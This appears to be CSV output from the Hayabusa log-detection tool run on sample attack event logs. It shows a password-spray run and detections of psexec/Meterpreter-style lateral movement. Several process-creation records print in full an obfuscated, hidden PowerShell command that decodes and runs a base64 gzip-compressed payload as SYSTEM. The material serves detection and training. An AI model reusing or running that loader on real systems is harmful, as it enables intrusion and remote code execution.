2019-05-01 04:31:41.028 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mtoussain  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:42.075 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lschifano  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:43.142 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bhostetler  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:44.208 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: rbowes  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:45.284 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ebooth  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:46.379 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cfleener  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:47.433 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cmoody  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:48.512 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: psmith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:49.576 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jkulikowski  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:50.656 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: gsalinas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:51.729 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: tbennett  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:52.823 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: econrad  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:53.886 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:54.942 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jleytevidal  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:56.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lpesce  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:57.107 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sanson  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:58.193 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sarmstrong  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:31:59.253 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: wstrzelec  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:00.320 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: zmathis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:01.393 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: melliott  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:02.451 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: kperryman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:03.525 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jorchilles  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:03.525 +09:00,-,-,medium,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:14 TargetUserName:bgreenwood/baker/drook/jorchilles/ssims/dmashburn/edygert/bgalbraith/bking/cragoso/jlake/smisenar/mdouglas/cspizor IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,-
2019-05-01 04:32:04.597 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jlake  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:05.675 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: edygert  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:06.738 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: drook  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:07.835 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dmashburn  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:08.911 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cspizor  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:09.973 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cragoso  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:11.051 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgalbraith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:12.146 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bking  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:13.221 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mdouglas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:14.281 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgreenwood  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:15.352 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: baker  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:16.402 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ssims  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:32:17.474 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 05:26:51.981 +09:00,IEWIN7,13,high,PowerShell as a Service in Registry,,rules/sigma/registry_event/sysmon_powershell_as_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:51.981 +09:00,IEWIN7,13,critical,CobaltStrike Service Installations in Registry,,rules/sigma/registry_event/sysmon_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.090 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Mimikatz Command Line,,rules/sigma/process_creation/win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Curl Start Combination,,rules/sigma/process_creation/win_susp_curl_start_combo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.106 +09:00,IEWIN7,1,informational,Process Creation,"Command: powershell.exe  -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);""  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Mimikatz Command Line,,rules/sigma/process_creation/win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.106 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Suspicious PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
